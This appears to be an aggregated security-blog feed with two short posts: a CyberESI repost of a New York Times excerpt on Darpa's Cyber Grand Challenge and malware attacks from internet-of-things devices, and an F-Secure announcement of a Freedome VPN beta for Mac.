“If we want to put networked technologies into more and more things, we also have to find a way to make them safer,” said Michael Walker, a program manager and computer security expert at the Pentagon’s advanced research arm. “It’s a challenge for civilization.”

To help address that challenge, Mr. Walker and the Defense Advanced Research Projects Agency, or Darpa, created a contest with millions of dollars in prize money, called the Cyber Grand Challenge. To win, contestants would have to create automated digital defense systems that could identify and fix software vulnerabilities on their own — essentially smart software robots as sentinels for digital security.

A reminder of the need for stepped-up security came a few weeks after the Darpa-sponsored competition, which was held in August. Researchers for Level 3 Communications, a telecommunications company, said they had detected several strains of malware that launched attacks on websites from compromised internet-of-things devices.

Read the full article at The New York Times.

The post Stepping up security for an Internet-of-Things World appeared first on CyberESI.

Posted: 18 Oct 2016 | 7:42 am

Freedome VPN For Mac OS X

Take a look at this:

F-Secure Freedome for OS X (freshly installed on a Labs Mac Team MacBook).


The beta is now open for everyone to try for 60 days at no cost.

Download or share.

On 24/04/15 At 12:37 PM

Posted: 24 Apr 2015 | 1:37 am